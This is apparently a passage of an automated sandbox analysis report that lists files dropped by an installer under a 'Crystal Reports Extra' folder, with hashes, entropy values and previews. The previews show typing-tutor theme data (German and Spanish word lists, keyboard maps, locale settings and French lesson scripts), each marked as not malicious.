                                                          Encrypted:false
                                                          SSDEEP:96:k7eWpc/g/2aIMK1MYyQvIMR6+mnfHZoEkGbNrXoN:k7eWO4uaILTyX1+mf+EkGbNr4N
                                                          MD5:804387E652C9D0E72EBEDAABEF18B01B
                                                          SHA1:2429D742AD9C922CBE4A6D06E3C9D2612B3B40C0
                                                          SHA-256:9218C1EE78710FAB0D37B439F2B5357A30DE145345EC53719A160AEA4D440B03
                                                          SHA-512:4CD6F7E271BD8FBF326FFEA90A343471B2E194A1FB850DB09370C34E40A6D431EE9D13290E8E9FA422B34757DDFDF9A0B3412E605A347B3899583C0C609B8985
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mittellange W.rter (gemischt).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt.ACHT.AFFE.ALLE.ARZT.ATEM.AUCH.AULA.AUTO.BAHN.BAND.BANK.BASS.BAUM.BEIN.BERG.BETT.BILD.BISS.BLAU.BLUT.BOOT.BROT.BUCH.BURG.CENT.CHOR.DAME.DORF.DORT.DOSE.DREI.DUFT.ECHO.ECHT.ECKE.EINS.ENDE.ENTE.ERDE.ERST.ESEL.EURO.FACH.FALL.FANG.FASS.FAUL.FELD.FEST.FILM.FLUG.FOTO.FRAU.FREI.FROH.F.NF.GANS.GANZ.GAST.GELB.GELD.GIPS.GLAS.GOLD.GOTT.GRAS.GRO..GR.N.GUSS.HAAR.HAHN.HALB.HALS.HALT.HAND.HART.HASE.HAUS.HAUT.HEFT.HELL.HEMD.HERB.HERD.HERZ.HEXE.HIER.HOCH.HOSE.HUHN.HUND.IGEL.JAHR.JULI.JUNG.JUNI.KAHL.KAHN.KALK.KALT.KARO.K.SE.KEIN.KERN.KILO.KIND.KINO.KOCH.KOHL.K.LN.KOPF.KORN.KRAN.K.HL.KUSS.LAHM.LAND.LANG.L.RM.LAUT.LEER.LIED.LILA.LOCH.L.WE.LUFT.MAMA.MANN.M.RZ.MAUS.MEER.MIST.MOND.M.WE.M.LL.MUND.NAME.NASE.NASS.NEIN.NEST.NEUN.NOCH.NULL.NUSS.OBEN.OBER.OFEN.PAAR.PAPA.PARK.PASS.POPO.POST.RAND.RAUM.REDE.REIS.RIND.RING.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\is-GVUMK.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):1088
                                                          Entropy (8bit):4.877421057849533
                                                          Encrypted:false
                                                          SSDEEP:24:PNVeYVQ0bRmg/aDuoCYIFwRWfTi5R+vA6tYHXsRKT8:PNVeYVmFPOwcGL+vA6Dm8
                                                          MD5:D77608EB7BDE2AAC8EEBCCC6D2F8E74C
                                                          SHA1:7D536D5049E56945782C6C12A63E398496CF12F9
                                                          SHA-256:F3AFE957C497ED75E6254531F343C5C4B63B1C68EC9DE552B7ECA5A2F59DC7F3
                                                          SHA-512:96D2ED7C86C1CF36ADEDE5B30C39C200059F32799F7B18E856A26C16BD9F25CF31BBCBD60D53D5814069F1B26B2B2F4E38787DF9B267285F973D6F325972890B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Lange W.rter (gemischt).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt.ACHTUNG.ACHTZIG.ANTWORT.APPETIT.BAHNHOF.B.UERIN.BESETZT.COUSINE.DAGEGEN.DESHALB.FAHRRAD.FEBRUAR.FLASCHE.FLEISCH.FREUNDE.GIRAFFE.GREIFEN.HAMSTER.HUNDERT.KELLNER.KETCHUP.KIRSCHE.L.CHELN.LANGSAM.M.DCHEN.MILLION.NACHBAR.NASHORN.NEUNZIG.NOCHMAL.NORDPOL.OKTOBER.PFEFFER.PFLANZE.PFLAUME.PISTOLE.PORTION.RECHNEN.RICHTER.SAMMELN.SCHLUSS.SCHNELL.SCHNITT.SCHRANK.SCHRECK.SCHRITT.SCH.LER.SCHWACH.SCHWARZ.SCHWEIN.SCHWERT.SECHZIG.SEKUNDE.SIEBZIG.SPIEGEL.SPIELEN.SPRACHE.STELLEN.STERBEN.STRASSE.STRUMPF.TAUCHEN.TAUSEND.TELEFON.TEPPICH.TOCHTER.TROCKEN..BERALL.UNDICHT.VERKEHR.VIERZIG.WACHSEN.WASCHEN.WELCHEN.WELCHES.WESHALB.WICHTIG.WIEVIEL.WOHNUNG.ZEUGNIS.ZWANZIG.ZWIEBEL.DEZEMBER.DREISSIG.ELEPHANT.ERDBEERE.FREUNDIN.FR.HLING.GEWITTER.LIMONADE.LUTSCHER.MAULWURF.MOTORRAD.NOVEMBER.PFIRSICH.PFLASTER.POLIZIST.RUCKSACK.SCHLAFEN.SC
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\is-OL7PH.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):242
                                                          Entropy (8bit):5.032744880363562
                                                          Encrypted:false
                                                          SSDEEP:6:w11KNStZIyeh6FM/AgvRTSxtvT4cmLCirYZX3ys7IVwUomv:w/KNStZIyehKQAQ0bMcmmUYZ/7KwUoY
                                                          MD5:E63923B036913F744510158E945A14C5
                                                          SHA1:AD80E651C2306CA30645374737BBB5436B092D8D
                                                          SHA-256:216D1522D74E45E1EA8EFDF164A22D72A1990F3476E1235E786419D10040C259
                                                          SHA-512:20424A3D39312B18F2FCD76C516F4237FEEC54401BA0F854DEAAC3FAB3B21C2A1760C38024CA04605245D5EAA82A265603A3AD13A1714A33F59D2FDB04B9F0C4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Lange W.rter (mit ....).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt.B.UERIN.L.CHELN.M.DCHEN.SCH.LER..BERALL.FR.HLING.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\kurz2-3-mit.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):262
                                                          Entropy (8bit):4.977809871929063
                                                          Encrypted:false
                                                          SSDEEP:6:/f+KNStZIyeh6FM/AgvRTSxtvT4cmLCirYZq2Npv5QBf2lWd:/GKNStZIyehKQAQ0bMcmmUYZLjRlU
                                                          MD5:D932B1FFC8B5321EE9C7A9EF7CBB8BFA
                                                          SHA1:5E6ACE040D0A3291687DC129A2AB02DB4DC5C1FC
                                                          SHA-256:041068A572C5265693A0369E79E2080055F5EDDCE35A80024985ED45D150A2C4
                                                          SHA-512:C9D4250A1ACA4CD7C342ACBD17BD5B6EAA957364C2F535DC87D27E1B85A8E9493B5C8F743F8FFF14A509C5A78E4130C185720662ABD9086F8B56B214111E7D1E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Kurze W.rter (mit ....).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt..L.B.R.F.N.F.R.FU..J.H.K.R.MA..MU...HR..SE.RU..S...T.R.Z.H.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\kurz2-3.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):748
                                                          Entropy (8bit):4.937127782916994
                                                          Encrypted:false
                                                          SSDEEP:12:/GKNZIyehKQAQ0bMcmmUYZAafAmk7df5oUj7/KV5FdjBYfZ10t5AHpBkR9Cxiuoq:/XNVeYVQ0bRmgnImw5oUj7/KVFjSL03Y
                                                          MD5:3C435E36363E652943C29CD86F2C8818
                                                          SHA1:CF6B7A8A8731730D21407AFFE40D06B94415D28B
                                                          SHA-256:D55885604A0BC9B1E7767ADA1982A4C788A03160165326CAAAE29207DDD47847
                                                          SHA-512:6F888B08E2AC750911AAA62D928A2E06FB94D421F3D617CF46FF5B1DA0662019AACCFC39C0860E9A6C3DB1BECB71358799FBA2A017DFD22FF51BAF78B0F04858
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Kurze W.rter (gemischt).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt.AB.AM.AN.AS.DA.DU.EI.ER.ES.IM.IN.JA.OB..L.PO.SO.UM.WO.ZU.AAL.AKT.ALS.AMT.ARM.ART.AUF.BAD.B.R.BAU.BEI.BIN.BIS.BUG.BUS.DAS.DER.DIA.DIE.EID.EIN.EIS.ELF.ENG.FEE.FIX.F.N.F.R.FU..GAR.GAS.GUT.HAI.HEU.HOF.HUF.HUT.IHM.IHN.IHR.IST.J.H.JUX.KAP.KUH.KUR.K.R.LAS.LAX.LID.LOB.LOK.LOS.MAG.MAI.MAL.MAN.MA..MET.MIT.MU..NAH.NEU.NIE.NOT.NUN.NUR.OFT.OHR..HR.OMA.OPA.ORT..SE.PER.PIK.POL.PRO.RAD.RAR.RAT.REH.ROH.ROM.ROT.RUF.RU..SAU.SEE.SIE.SKI.S...TAG.TAL.TAT.TEE.TOD.TON.TOR.TOT.T.R.TUX.TYP.UHR.UHU.ULK.UND.VON.VOR.WAL.WAS.WEG.WEH.WEM.WEN.WER.WIE.WIR.WUT.Z.H.ZEH.ZOO.ZUG.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\lang7-8-mit.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):242
                                                          Entropy (8bit):5.032744880363562
                                                          Encrypted:false
                                                          SSDEEP:6:w11KNStZIyeh6FM/AgvRTSxtvT4cmLCirYZX3ys7IVwUomv:w/KNStZIyehKQAQ0bMcmmUYZ/7KwUoY
                                                          MD5:E63923B036913F744510158E945A14C5
                                                          SHA1:AD80E651C2306CA30645374737BBB5436B092D8D
                                                          SHA-256:216D1522D74E45E1EA8EFDF164A22D72A1990F3476E1235E786419D10040C259
                                                          SHA-512:20424A3D39312B18F2FCD76C516F4237FEEC54401BA0F854DEAAC3FAB3B21C2A1760C38024CA04605245D5EAA82A265603A3AD13A1714A33F59D2FDB04B9F0C4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Lange W.rter (mit ....).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt.B.UERIN.L.CHELN.M.DCHEN.SCH.LER..BERALL.FR.HLING.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\lang7-8.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):1088
                                                          Entropy (8bit):4.877421057849533
                                                          Encrypted:false
                                                          SSDEEP:24:PNVeYVQ0bRmg/aDuoCYIFwRWfTi5R+vA6tYHXsRKT8:PNVeYVmFPOwcGL+vA6Dm8
                                                          MD5:D77608EB7BDE2AAC8EEBCCC6D2F8E74C
                                                          SHA1:7D536D5049E56945782C6C12A63E398496CF12F9
                                                          SHA-256:F3AFE957C497ED75E6254531F343C5C4B63B1C68EC9DE552B7ECA5A2F59DC7F3
                                                          SHA-512:96D2ED7C86C1CF36ADEDE5B30C39C200059F32799F7B18E856A26C16BD9F25CF31BBCBD60D53D5814069F1B26B2B2F4E38787DF9B267285F973D6F325972890B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Lange W.rter (gemischt).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt.ACHTUNG.ACHTZIG.ANTWORT.APPETIT.BAHNHOF.B.UERIN.BESETZT.COUSINE.DAGEGEN.DESHALB.FAHRRAD.FEBRUAR.FLASCHE.FLEISCH.FREUNDE.GIRAFFE.GREIFEN.HAMSTER.HUNDERT.KELLNER.KETCHUP.KIRSCHE.L.CHELN.LANGSAM.M.DCHEN.MILLION.NACHBAR.NASHORN.NEUNZIG.NOCHMAL.NORDPOL.OKTOBER.PFEFFER.PFLANZE.PFLAUME.PISTOLE.PORTION.RECHNEN.RICHTER.SAMMELN.SCHLUSS.SCHNELL.SCHNITT.SCHRANK.SCHRECK.SCHRITT.SCH.LER.SCHWACH.SCHWARZ.SCHWEIN.SCHWERT.SECHZIG.SEKUNDE.SIEBZIG.SPIEGEL.SPIELEN.SPRACHE.STELLEN.STERBEN.STRASSE.STRUMPF.TAUCHEN.TAUSEND.TELEFON.TEPPICH.TOCHTER.TROCKEN..BERALL.UNDICHT.VERKEHR.VIERZIG.WACHSEN.WASCHEN.WELCHEN.WELCHES.WESHALB.WICHTIG.WIEVIEL.WOHNUNG.ZEUGNIS.ZWANZIG.ZWIEBEL.DEZEMBER.DREISSIG.ELEPHANT.ERDBEERE.FREUNDIN.FR.HLING.GEWITTER.LIMONADE.LUTSCHER.MAULWURF.MOTORRAD.NOVEMBER.PFIRSICH.PFLASTER.POLIZIST.RUCKSACK.SCHLAFEN.SC
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\mittel4-6-mit.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):454
                                                          Entropy (8bit):5.122530076508582
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mittellange W.rter (mit ....).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt.F.NF.GRO..GR.N.K.SE.K.LN.K.HL.L.RM.L.WE.M.RZ.M.WE.M.LL..BEN..BER.WEI..DAF.R.F.HRE.GL.CK.H.FTE.H.GEL.K.STE.L.NGE.M.BEL.M.GEN.M.HRE.SCH.N.ST.CK.S.DEN.Z.GEL.ZW.LF.BR.CKE.F.NZIG.HEI.EN.K.RPER.L.FFEL.SP.LEN.S.DPOL.W.SCHE.ZUR.CK.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\deutsch\words\mittel4-6.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):3354
                                                          Entropy (8bit):4.531608584537004
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mittellange W.rter (gemischt).# Hier kannst du selber W.rter hinzuf.gen..# Zeilen die mit '#' beginnen und Leerzeilen werden ignoriert..# Es sind H.chstens 200 Zeilen pro Datei erlaubt.ACHT.AFFE.ALLE.ARZT.ATEM.AUCH.AULA.AUTO.BAHN.BAND.BANK.BASS.BAUM.BEIN.BERG.BETT.BILD.BISS.BLAU.BLUT.BOOT.BROT.BUCH.BURG.CENT.CHOR.DAME.DORF.DORT.DOSE.DREI.DUFT.ECHO.ECHT.ECKE.EINS.ENDE.ENTE.ERDE.ERST.ESEL.EURO.FACH.FALL.FANG.FASS.FAUL.FELD.FEST.FILM.FLUG.FOTO.FRAU.FREI.FROH.F.NF.GANS.GANZ.GAST.GELB.GELD.GIPS.GLAS.GOLD.GOTT.GRAS.GRO..GR.N.GUSS.HAAR.HAHN.HALB.HALS.HALT.HAND.HART.HASE.HAUS.HAUT.HEFT.HELL.HEMD.HERB.HERD.HERZ.HEXE.HIER.HOCH.HOSE.HUHN.HUND.IGEL.JAHR.JULI.JUNG.JUNI.KAHL.KAHN.KALK.KALT.KARO.K.SE.KEIN.KERN.KILO.KIND.KINO.KOCH.KOHL.K.LN.KOPF.KORN.KRAN.K.HL.KUSS.LAHM.LAND.LANG.L.RM.LAUT.LEER.LIED.LILA.LOCH.L.WE.LUFT.MAMA.MANN.M.RZ.MAUS.MEER.MIST.MOND.M.WE.M.LL.MUND.NAME.NASE.NASS.NEIN.NEST.NEUN.NOCH.NULL.NUSS.OBEN.OBER.OFEN.PAAR.PAPA.PARK.PASS.POPO.POST.RAND.RAUM.REDE.REIS.RIND.RING.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\images\is-VKSF5.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PNG image data, 300 x 200, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):1141
                                                          Entropy (8bit):6.871978008324613
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\images\map.png (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PNG image data, 300 x 200, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):1141
                                                          Entropy (8bit):6.871978008324613
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\is-KTB13.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):253
                                                          Entropy (8bit):4.581372613035101
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: # keyboard.lst for Spanish theme.0|A.0|a.3|B.3|b.3|C.3|c.2|D.2|d.2|E.2|e.3|F.3|f.3|G.3|g.6|H.6|h.7|I.7|i.6|J.6|j.7|K.7|k.8|L.8|l.6|M.6|m.6|N.6|n.8|O.8|o.9|P.9|p.0|Q.0|q.3|R.3|r.1|S.1|s.3|T.3|t.6|U.6|u.3|V.3|v.1|W.1|w.1|X.1|x.6|Y.6|y.0|Z.0|z.9|..9|..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\is-TT7JD.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):30
                                                          Entropy (8bit):4.161406329721842
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: theme_locale_name=es_ES.UTF-8.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\keyboard.lst (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):253
                                                          Entropy (8bit):4.581372613035101
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: # keyboard.lst for Spanish theme.0|A.0|a.3|B.3|b.3|C.3|c.2|D.2|d.2|E.2|e.3|F.3|f.3|G.3|g.6|H.6|h.7|I.7|i.6|J.6|j.7|K.7|k.8|L.8|l.6|M.6|m.6|N.6|n.8|O.8|o.9|P.9|p.0|Q.0|q.3|R.3|r.1|S.1|s.3|T.3|t.6|U.6|u.3|V.3|v.1|W.1|w.1|X.1|x.6|Y.6|y.0|Z.0|z.9|..9|..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\settings.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):30
                                                          Entropy (8bit):4.161406329721842
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: theme_locale_name=es_ES.UTF-8.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\words\is-LGOU5.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):199
                                                          Entropy (8bit):4.19721699571068
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Words Dos..CORTA..DEBIL..PRIMO..CIGARO..LAPIZ..GUAPO..HERMOSA..NARIZ..TENGO..MUSEO..CENAR..PERRO..GATITO..MUSICA..PADRE..MEJOR..HERMANO..FACIL..CLARO..ESPEJO..LABIOS..ESCALA..FELIZ..LIBRO..SOMBRA....
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\words\is-P16BO.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):239
                                                          Entropy (8bit):4.262434715581227
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Words Tres..PELICULA..MAESTRO..TRABAJO..DIVERTIR..DESAYUNO..BOTELLA..SERVICIO..ESCUSADO..EDIFICIO..VENTANA..TELEFONO..PINTURA..LECTURA..LECCION..CABALLO..CORAZON..PENSANDO..GENERAL..CUCHARA..CUCHILLO..CEREBRO..MONTANA..ASUSTADO..PLASTICO..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\words\is-QCAR9.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):142
                                                          Entropy (8bit):4.004587747695663
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Words Uno..PAN..PEZ..HORA..MALO..PAPA..SED..SECA..AGUA..DEDO..OLA..HOLA..MIO..DIA..FEO..TIA..PIE..UNA..UNO..OJO..BOCA..CARA..MANO..REY..BEBE..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\words\words1.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):142
                                                          Entropy (8bit):4.004587747695663
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Words Uno..PAN..PEZ..HORA..MALO..PAPA..SED..SECA..AGUA..DEDO..OLA..HOLA..MIO..DIA..FEO..TIA..PIE..UNA..UNO..OJO..BOCA..CARA..MANO..REY..BEBE..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\words\words2.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):199
                                                          Entropy (8bit):4.19721699571068
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Words Dos..CORTA..DEBIL..PRIMO..CIGARO..LAPIZ..GUAPO..HERMOSA..NARIZ..TENGO..MUSEO..CENAR..PERRO..GATITO..MUSICA..PADRE..MEJOR..HERMANO..FACIL..CLARO..ESPEJO..LABIOS..ESCALA..FELIZ..LIBRO..SOMBRA....
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\espanol\words\words3.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):239
                                                          Entropy (8bit):4.262434715581227
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Words Tres..PELICULA..MAESTRO..TRABAJO..DIVERTIR..DESAYUNO..BOTELLA..SERVICIO..ESCUSADO..EDIFICIO..VENTANA..TELEFONO..PINTURA..LECTURA..LECCION..CABALLO..CORAZON..PENSANDO..GENERAL..CUCHARA..CUCHILLO..CEREBRO..MONTANA..ASUSTADO..PLASTICO..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\is-83OPV.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):29
                                                          Entropy (8bit):4.073329701949522
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: theme_locale_name=fr_FR.utf8.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\is-FTKBT.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):314
                                                          Entropy (8bit):4.484097721342558
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: # Default (English) keyboard.lst file.0|A.0|a.3|B.3|b.2|C.2|c.2|D.2|d.2|E.2|e.3|F.3|f.3|G.3|g.6|H.6|h.7|I.7|i.6|J.6|j.7|K.7|k.8|L.8|l.6|M.6|m.6|N.6|n.8|O.8|o.9|P.9|p.0|Q.0|q.3|R.3|r.1|S.1|s.3|T.3|t.6|U.6|u.3|V.3|v.1|W.1|w.1|X.1|x.6|Y.6|y.0|Z.0|z.5| .0|!.0|@.0|#.0|1.0|2.0|3.0|4.0|5.0|6.0|7.0|8.0|9.0|0.7|,.8|..9|;.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\keyboard.lst (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):314
                                                          Entropy (8bit):4.484097721342558
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: # Default (English) keyboard.lst file.0|A.0|a.3|B.3|b.2|C.2|c.2|D.2|d.2|E.2|e.3|F.3|f.3|G.3|g.6|H.6|h.7|I.7|i.6|J.6|j.7|K.7|k.8|L.8|l.6|M.6|m.6|N.6|n.8|O.8|o.9|P.9|p.0|Q.0|q.3|R.3|r.1|S.1|s.3|T.3|t.6|U.6|u.3|V.3|v.1|W.1|w.1|X.1|x.6|Y.6|y.0|Z.0|z.5| .0|!.0|@.0|#.0|1.0|2.0|3.0|4.0|5.0|6.0|7.0|8.0|9.0|0.7|,.8|..9|;.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\scripts\is-SL6OD.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:HTML document, UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):1384
                                                          Entropy (8bit):5.110067590881047
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: <script title="Test Lesson" bgcolor="#3f4f1f">..<page title="Introduction to Example Lesson">...<text align="center">Les mois de l'ann.e</text>...<text align="center"> </text>...<text align="center"> </text>...<text align="center" y="300"> PRESS SPACE TO START THE LESSON!</text>...<waitforinput/>..</page>..<page title="The a Key" bgcolor="#3f7f3f">...<img src="/keyboard/keyboard-us.png" x="45" y="220"/>...<text align="center">Les mois de l'ann.e</text>...<text align="center">To start practicing hit the p key</text>...<text color="#000000" x="100" y="273">A</text>...<text color="#000000" x="130" y="273">S</text>...<waitforchar/>...<prac>janvier f.vrier mars avril mai juin juillet ao.t septembre octobre novembre d.cembre janvier f.vrier mars avril mai juin juillet ao.t septembre octobre novembre d.cembre janvier f.vrier mars avril mai juin juillet ao.t septembre octobre novembre d.cembre</prac>..</page>.. HACK: there is some undesired behavior in scripting.c, this fixes it
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\scripts\is-TFF2G.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:HTML document, ASCII text
                                                          Category:dropped
                                                          Size (bytes):1406
                                                          Entropy (8bit):4.749083233063025
                                                          Encrypted:false
                                                          Malicious:false
                                                          Reputation:unknown
